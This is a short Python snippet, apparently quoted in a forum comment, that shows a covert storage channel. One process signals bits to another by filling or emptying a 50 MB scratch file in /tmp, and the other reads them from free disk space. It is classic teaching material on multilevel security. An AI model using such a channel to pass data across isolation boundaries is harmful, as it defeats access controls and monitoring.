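    SCRATCH = "/tmp/covert_scratch"     # any filesystem both processes can see
    FILL_BYTES = 50 * 1024 * 1024       # big enough to move the free-space number
    BIT_DELAY = 2.0                     # crude agreed-upon bit period, in seconds

    def send_bit(bit: int):
        """Higher-level process: a 1 means 'make the disk noticeably fuller'."""
        if bit:
            with open(SCRATCH, "wb") as f:
                f.write(b"\0" * FILL_BYTES)
        elif os.path.exists(SCRATCH):
            os.remove(SCRATCH)
        time.sleep(BIT_DELAY)

    def receive_bit(baseline_free: int) -> int:
        """Lower-level process: infer the bit from how much free space vanished."""
        free_now = shutil.disk_usage("/tmp").free
        time.sleep(BIT_DELAY)
        return 1 if baseline_free - free_now > FILL_BYTES // 2 else 0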
Alternate Link (Score:5)